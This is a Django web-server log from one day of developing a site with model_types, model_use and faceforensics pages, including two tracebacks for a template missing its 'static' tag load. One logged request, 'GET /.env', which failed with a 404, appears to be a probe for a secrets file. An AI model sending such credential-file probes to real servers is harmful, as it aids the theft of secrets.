  File "/usr/local/lib/python3.8/dist-packages/django/template/base.py", line 568, in invalid_block_tag
    raise self.error(
django.template.exceptions.TemplateSyntaxError: Invalid block tag on line 16: 'static'. Did you forget to register or load this tag?
[15/Dec/2024 17:32:42] "GET / HTTP/1.0" 500 136901
[15/Dec/2024 17:34:00] "GET / HTTP/1.0" 200 4720
[15/Dec/2024 17:34:02] "GET / HTTP/1.0" 200 4720
[15/Dec/2024 17:34:10] "GET /model_use/ HTTP/1.0" 200 3427
[15/Dec/2024 17:34:13] "GET /model_use/ HTTP/1.0" 200 3427
[15/Dec/2024 17:34:16] "GET /model_types/ HTTP/1.0" 200 6218
[15/Dec/2024 17:34:18] "GET /model_use/ HTTP/1.0" 200 3427
[15/Dec/2024 17:34:33] "GET /model_types/ HTTP/1.0" 200 6218
[15/Dec/2024 17:35:53] "GET / HTTP/1.0" 200 4720
[15/Dec/2024 17:38:53] "GET / HTTP/1.0" 200 4720
[15/Dec/2024 17:38:55] "GET /model_types/ HTTP/1.0" 200 3385
[15/Dec/2024 17:40:46] "GET /model_types/ HTTP/1.0" 200 8347
[15/Dec/2024 17:41:07] "GET /model_types/ HTTP/1.0" 200 6218
[15/Dec/2024 17:43:23] "GET /model_types/ HTTP/1.0" 200 8730
[15/Dec/2024 17:43:52] "GET /model_types/ HTTP/1.0" 200 6218
[15/Dec/2024 17:46:35] "GET /model_types/ HTTP/1.0" 200 8674
[15/Dec/2024 17:47:00] "GET /model_types/ HTTP/1.0" 200 6218
[15/Dec/2024 17:49:08] "GET /model_types/ HTTP/1.0" 200 8907
[15/Dec/2024 17:50:16] "GET /model_types/ HTTP/1.0" 200 8421
[15/Dec/2024 17:51:58] "GET /model_types/ HTTP/1.0" 200 8642
[15/Dec/2024 17:52:28] "GET /model_types/ HTTP/1.0" 200 8641
[15/Dec/2024 17:52:38] "GET /model_types/ HTTP/1.0" 200 8642
[15/Dec/2024 17:52:46] "GET /model_types/ HTTP/1.0" 200 8641
[15/Dec/2024 17:52:58] "GET /model_types/ HTTP/1.0" 200 8647
[15/Dec/2024 17:53:05] "GET /model_types/ HTTP/1.0" 200 8647
[15/Dec/2024 17:53:11] "GET /model_types/ HTTP/1.0" 200 8647
[15/Dec/2024 17:54:23] "GET /model_types/ HTTP/1.0" 200 8647
[15/Dec/2024 17:54:24] "GET /model_types/ HTTP/1.0" 200 8647
[15/Dec/2024 17:54:24] "GET /model_types/ HTTP/1.0" 200 8647
[15/Dec/2024 17:54:35] "GET /model_types/ HTTP/1.0" 200 8647
[15/Dec/2024 17:54:55] "GET /model_types/ HTTP/1.0" 200 8646
[15/Dec/2024 17:54:55] "GET /model_types/ HTTP/1.0" 200 8646
[15/Dec/2024 17:55:05] "GET /model_types/ HTTP/1.0" 200 8646
[15/Dec/2024 17:55:05] "GET /model_types/ HTTP/1.0" 200 8646
[15/Dec/2024 17:55:06] "GET /model_types/ HTTP/1.0" 200 8646
[15/Dec/2024 17:56:12] "GET /model_types/ HTTP/1.0" 200 8646
[15/Dec/2024 17:56:46] "GET /model_types/ HTTP/1.0" 200 8645
[15/Dec/2024 17:57:27] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 17:59:06] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 17:59:07] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 17:59:08] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 17:59:08] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 17:59:09] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 17:59:09] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 17:59:09] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 17:59:10] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 17:59:10] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 17:59:36] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 17:59:37] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 17:59:37] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 17:59:37] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 17:59:48] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 17:59:48] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 17:59:48] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 17:59:49] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:00:00] "GET / HTTP/1.0" 200 4720
[15/Dec/2024 18:00:03] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:01:43] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:01:44] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:01:44] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:01:44] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:01:45] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:01:45] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:01:45] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:02:28] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:02:37] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:02:45] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:02:55] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:02:56] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:02:56] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:02:56] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:03:05] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:03:05] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:03:26] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:03:26] "GET /model_types/ HTTP/1.0" 200 8639
[15/Dec/2024 18:04:09] "GET /model_types/ HTTP/1.0" 200 8648
[15/Dec/2024 18:05:00] "GET /model_types/ HTTP/1.0" 200 8648
[15/Dec/2024 18:05:01] "GET /model_types/ HTTP/1.0" 200 8648
[15/Dec/2024 18:05:17] "GET /model_types/ HTTP/1.0" 200 8648
[15/Dec/2024 18:05:35] "GET /model_types/ HTTP/1.0" 200 8648
[15/Dec/2024 18:05:52] "GET /model_types/ HTTP/1.0" 200 8654
[15/Dec/2024 18:06:55] "GET /model_types/ HTTP/1.0" 200 8656
[15/Dec/2024 18:07:06] "GET /model_types/ HTTP/1.0" 200 8684
[15/Dec/2024 18:07:22] "GET /model_types/ HTTP/1.0" 200 8684
[15/Dec/2024 18:07:36] "GET /model_types/ HTTP/1.0" 200 8684
[15/Dec/2024 18:07:51] "GET /model_types/ HTTP/1.0" 200 8712
[15/Dec/2024 18:08:14] "GET /model_types/ HTTP/1.0" 200 8721
[15/Dec/2024 18:08:51] "GET /model_types/ HTTP/1.0" 200 8751
[15/Dec/2024 18:10:04] "GET /model_types/ HTTP/1.0" 200 8795
[15/Dec/2024 18:10:19] "GET /model_types/ HTTP/1.0" 200 8796
[15/Dec/2024 18:12:04] "GET /model_types/ HTTP/1.0" 200 8916
[15/Dec/2024 18:12:31] "GET /model_types/ HTTP/1.0" 200 8944
[15/Dec/2024 18:12:51] "GET /model_types/ HTTP/1.0" 200 8953
[15/Dec/2024 18:15:16] "GET /model_types/ HTTP/1.0" 200 9049
[15/Dec/2024 18:15:41] "GET /model_types/ HTTP/1.0" 200 9087
[15/Dec/2024 18:15:42] "GET /model_types/ HTTP/1.0" 200 9087
[15/Dec/2024 18:16:06] "GET /model_types/ HTTP/1.0" 200 9084
[15/Dec/2024 18:16:53] "GET /model_types/ HTTP/1.0" 200 9088
[15/Dec/2024 18:18:45] "GET /model_types/ HTTP/1.0" 200 9087
[15/Dec/2024 18:18:46] "GET /model_types/ HTTP/1.0" 200 9087
[15/Dec/2024 18:24:04] "GET /model_types/ HTTP/1.0" 200 9057
[15/Dec/2024 18:25:11] "GET /model_types/ HTTP/1.0" 200 8953
[15/Dec/2024 18:27:13] "GET /model_types/ HTTP/1.0" 200 8984
[15/Dec/2024 18:27:14] "GET /model_types/ HTTP/1.0" 200 8984
[15/Dec/2024 18:29:19] "GET /model_types/ HTTP/1.0" 200 6782
[15/Dec/2024 18:31:04] "GET /model_types/ HTTP/1.0" 200 8982
[15/Dec/2024 18:31:43] "GET /model_types/ HTTP/1.0" 200 8910
Not Found: /.env
[15/Dec/2024 18:31:55] "GET /.env HTTP/1.0" 404 2879
[15/Dec/2024 18:32:23] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:32:24] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:32:29] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:32:30] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:33:10] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:33:10] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:33:11] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:33:26] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:33:26] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:33:27] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:34:04] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:34:05] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:34:06] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:34:06] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:34:09] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:34:09] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:34:09] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:34:21] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:34:22] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:34:22] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:34:36] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:34:36] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:34:37] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:34:38] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:34:39] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:34:39] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:34:52] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:35:18] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:35:18] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:35:18] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:35:19] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:35:19] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:35:30] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:35:30] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:35:30] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:35:31] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:35:39] "GET / HTTP/1.0" 200 4720
[15/Dec/2024 18:35:42] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:37:16] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:37:17] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:37:17] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:37:18] "GET /model_types/ HTTP/1.0" 200 8910
[15/Dec/2024 18:40:28] "GET /model_types/ HTTP/1.0" 200 11066
[15/Dec/2024 18:40:54] "GET /model_types/ HTTP/1.0" 200 10708
[15/Dec/2024 18:41:38] "GET /model_types/ HTTP/1.0" 200 10681
[15/Dec/2024 18:41:58] "GET /model_types/ HTTP/1.0" 200 10681
[15/Dec/2024 18:42:20] "GET /model_types/ HTTP/1.0" 200 10681
[15/Dec/2024 18:42:55] "GET /faceforensics/ HTTP/1.0" 200 4638
[15/Dec/2024 18:42:59] "GET /model_comparison/ HTTP/1.0" 200 2472
[15/Dec/2024 18:44:07] "GET / HTTP/1.0" 200 4708
[15/Dec/2024 18:44:30] "GET / HTTP/1.0" 200 4720
[15/Dec/2024 18:44:44] "GET / HTTP/1.0" 200 4662
[15/Dec/2024 18:44:56] "GET / HTTP/1.0" 200 4679
[15/Dec/2024 18:45:26] "GET /model_use/ HTTP/1.0" 200 5126
[15/Dec/2024 18:46:56] "GET /model_use/ HTTP/1.0" 200 6533
[15/Dec/2024 18:48:53] "GET /model_use/ HTTP/1.0" 200 7120
[15/Dec/2024 18:49:16] "GET /model_use/ HTTP/1.0" 200 7120
[15/Dec/2024 18:49:18] "GET / HTTP/1.0" 200 4662
[15/Dec/2024 18:49:21] "GET /model_use/ HTTP/1.0" 200 7120
[15/Dec/2024 18:49:31] "GET /model_use/ HTTP/1.0" 200 7120
[15/Dec/2024 18:49:37] "GET /model_use/ HTTP/1.0" 200 7120
[15/Dec/2024 18:50:09] "GET /model_use/ HTTP/1.0" 200 7114
[15/Dec/2024 18:50:14] "GET /model_use/ HTTP/1.0" 200 7114
[15/Dec/2024 18:50:21] "GET /model_use/ HTTP/1.0" 200 7114
[15/Dec/2024 18:50:45] "GET /model_use/ HTTP/1.0" 200 7117
[15/Dec/2024 18:51:02] "GET /model_use/ HTTP/1.0" 200 7123
[15/Dec/2024 18:51:03] "GET /model_use/ HTTP/1.0" 200 7123
[15/Dec/2024 18:51:04] "GET /model_use/ HTTP/1.0" 200 7123
[15/Dec/2024 18:51:04] "GET /model_use/ HTTP/1.0" 200 7123
[15/Dec/2024 18:51:10] "GET /model_use/ HTTP/1.0" 200 7114
[15/Dec/2024 18:51:19] "GET /model_use/ HTTP/1.0" 200 7120
[15/Dec/2024 18:51:28] "GET /model_use/ HTTP/1.0" 200 7120
[15/Dec/2024 18:51:41] "GET /model_use/ HTTP/1.0" 200 7120
[15/Dec/2024 18:51:50] "GET /model_types/ HTTP/1.0" 200 10681
[15/Dec/2024 18:51:53] "GET / HTTP/1.0" 200 4662
[15/Dec/2024 18:51:54] "GET /model_types/ HTTP/1.0" 200 10681
[15/Dec/2024 18:52:18] "GET /model_use/ HTTP/1.0" 200 7120
[15/Dec/2024 18:52:19] "GET /model_types/ HTTP/1.0" 200 10681
[15/Dec/2024 18:52:21] "GET /faceforensics/ HTTP/1.0" 200 4638
[15/Dec/2024 18:52:23] "GET /model_types/ HTTP/1.0" 200 10681
[15/Dec/2024 18:52:24] "GET /model_use/ HTTP/1.0" 200 7120
[15/Dec/2024 18:52:26] "GET /model_types/ HTTP/1.0" 200 10681
[15/Dec/2024 18:52:27] "GET / HTTP/1.0" 200 4662
[15/Dec/2024 18:52:29] "GET /model_types/ HTTP/1.0" 200 10681
[15/Dec/2024 18:52:33] "GET / HTTP/1.0" 200 4662
[15/Dec/2024 18:52:37] "GET /model_types/ HTTP/1.0" 200 10681
[15/Dec/2024 18:52:40] "GET /model_use/ HTTP/1.0" 200 7120
[15/Dec/2024 18:54:19] "GET /model_use/ HTTP/1.0" 200 7539
[15/Dec/2024 18:54:22] "GET /model_use/ HTTP/1.0" 200 7539
[15/Dec/2024 18:54:26] "GET / HTTP/1.0" 200 4662
[15/Dec/2024 18:54:28] "GET /model_types/ HTTP/1.0" 200 10681
[15/Dec/2024 18:54:37] "GET / HTTP/1.0" 200 4662
[15/Dec/2024 18:54:40] "GET /faceforensics/ HTTP/1.0" 200 4638
[15/Dec/2024 18:54:42] "GET /model_types/ HTTP/1.0" 200 10681
[15/Dec/2024 18:54:45] "GET /model_use/ HTTP/1.0" 200 7539
[15/Dec/2024 18:54:48] "GET /faceforensics/ HTTP/1.0" 200 4638
[15/Dec/2024 18:54:50] "GET / HTTP/1.0" 200 4662
[15/Dec/2024 18:55:00] "GET /model_types/ HTTP/1.0" 200 10681
[15/Dec/2024 18:56:37] "GET /faceforensics/ HTTP/1.0" 200 4638
[15/Dec/2024 18:56:42] "GET /faceforensics/ HTTP/1.0" 200 5803
[15/Dec/2024 18:56:59] "GET /faceforensics/ HTTP/1.0" 200 5803
[15/Dec/2024 18:57:51] "GET / HTTP/1.0" 200 4662
[15/Dec/2024 18:57:53] "GET /model_types/ HTTP/1.0" 200 10681
[15/Dec/2024 18:57:55] "GET / HTTP/1.0" 200 4662
[15/Dec/2024 18:57:56] "GET /model_use/ HTTP/1.0" 200 7539
[15/Dec/2024 18:57:58] "GET / HTTP/1.0" 200 4662
[15/Dec/2024 18:57:59] "GET /faceforensics/ HTTP/1.0" 200 5803
[15/Dec/2024 18:58:01] "GET /model_use/ HTTP/1.0" 200 7539
[15/Dec/2024 18:58:03] "GET /faceforensics/ HTTP/1.0" 200 5803
[15/Dec/2024 18:58:08] "GET /faceforensics/ HTTP/1.0" 200 5803
[15/Dec/2024 18:58:58] "GET / HTTP/1.0" 200 4662
[15/Dec/2024 18:59:01] "GET /faceforensics/ HTTP/1.0" 200 5803
[15/Dec/2024 18:59:03] "GET /model_types/ HTTP/1.0" 200 10681
[15/Dec/2024 18:59:27] "GET /faceforensics/ HTTP/1.0" 200 6756
[15/Dec/2024 18:59:28] "GET /faceforensics/ HTTP/1.0" 200 6756
[15/Dec/2024 18:59:31] "GET /faceforensics/ HTTP/1.0" 200 6756
[15/Dec/2024 18:59:43] "GET /faceforensics/ HTTP/1.0" 200 6756
[15/Dec/2024 18:59:51] "GET /faceforensics/ HTTP/1.0" 200 6756
[15/Dec/2024 19:00:32] "GET /model_types/ HTTP/1.0" 200 10681
Internal Server Error: /model_types/
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/template/base.py", line 505, in parse
    compile_func = self.tags[command]
KeyError: 'static'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 55, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/base.py", line 197, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "/myproject/myproject/views.py", line 27, in model_types
    return render(request, 'model_type.html')
  File "/usr/local/lib/python3.8/dist-packages/django/shortcuts.py", line 24, in render
    content = loader.render_to_string(template_name, context, request, using=using)
  File "/usr/local/lib/python3.8/dist-packages/django/template/loader.py", line 61, in render_to_string
    template = get_template(template_name, using=using)
  File "/usr/local/lib/python3.8/dist-packages/django/template/loader.py", line 15, in get_template
    return engine.get_template(template_name)
  File "/usr/local/lib/python3.8/dist-packages/django/template/backends/django.py", line 33, in get_template
    return Template(self.engine.get_template(template_name), self)
  File "/usr/local/lib/python3.8/dist-packages/django/template/engine.py", line 175, in get_template
    template, origin = self.find_template(template_name)
  File "/usr/local/lib/python3.8/dist-packages/django/template/engine.py", line 157, in find_template
    template = loader.get_template(name, skip=skip)
  File "/usr/local/lib/python3.8/dist-packages/django/template/loaders/cached.py", line 57, in get_template
    template = super().get_template(template_name, skip)
  File "/usr/local/lib/python3.8/dist-packages/django/template/loaders/base.py", line 28, in get_template
    return Template(
  File "/usr/local/lib/python3.8/dist-packages/django/template/base.py", line 154, in __init__
    self.nodelist = self.compile_nodelist()
  File "/usr/local/lib/python3.8/dist-packages/django/template/base.py", line 200, in compile_nodelist
    return parser.parse()
  File "/usr/local/lib/python3.8/dist-packages/django/template/base.py", line 507, in parse
    self.invalid_block_tag(token, command, parse_until)
  File "/usr/local/lib/python3.8/dist-packages/django/template/base.py", line 568, in invalid_block_tag
    raise self.error(
django.template.exceptions.TemplateSyntaxError: Invalid block tag on line 10: 'static'. Did you forget to register or load this tag?
[15/Dec/2024 19:02:38] "GET /model_types/ HTTP/1.0" 500 137312
[15/Dec/2024 19:03:40] "GET /model_types/ HTTP/1.0" 200 10973
[15/Dec/2024 19:04:16] "GET /model_types/ HTTP/1.0" 200 10973
[15/Dec/2024 19:04:41] "GET /model_types/ HTTP/1.0" 200 10973
[15/Dec/2024 19:04:56] "GET /model_types/ HTTP/1.0" 200 10973
[15/Dec/2024 19:05:06] "GET /model_types/ HTTP/1.0" 200 10973
[15/Dec/2024 19:07:00] "GET / HTTP/1.0" 200 4662
[15/Dec/2024 19:07:09] "GET / HTTP/1.0" 200 4662
[15/Dec/2024 19:07:09] "OPTIONS / HTTP/1.0" 200 4662
Not Found: /robots.txt
[15/Dec/2024 19:07:09] "OPTIONS / HTTP/1.0" 200 4662
[15/Dec/2024 19:07:34] "OPTIONS / HTTP/1.0" 200 4662
[15/Dec/2024 19:07:42] "OPTIONS / HTTP/1.0" 200 4662
[15/Dec/2024 19:08:15] "OPTIONS / HTTP/1.0" 200 4662
[15/Dec/2024 19:08:23] "OPTIONS / HTTP/1.0" 200 4662
[15/Dec/2024 19:08:26] "GET /model_types/ HTTP/1.0" 200 8440
[15/Dec/2024 19:08:27] "GET /model_types/ HTTP/1.0" 200 8440
[15/Dec/2024 19:08:28] "GET /model_types/ HTTP/1.0" 200 8440
[15/Dec/2024 19:11:06] "GET /model_types/ HTTP/1.0" 200 9027
[15/Dec/2024 19:12:18] "GET /model_types/ HTTP/1.0" 200 9027
[15/Dec/2024 19:12:19] "GET /model_types/ HTTP/1.0" 200 9027
[15/Dec/2024 19:12:20] "GET /model_use/ HTTP/1.0" 200 7539
[15/Dec/2024 19:12:21] "GET /faceforensics/ HTTP/1.0" 200 6756
[15/Dec/2024 19:12:22] "GET / HTTP/1.0" 200 4662
[15/Dec/2024 19:12:24] "GET /model_types/ HTTP/1.0" 200 9027
[15/Dec/2024 19:12:25] "GET / HTTP/1.0" 200 4662
[15/Dec/2024 19:12:26] "GET /model_use/ HTTP/1.0" 200 7539
[15/Dec/2024 19:12:27] "GET /model_types/ HTTP/1.0" 200 9027
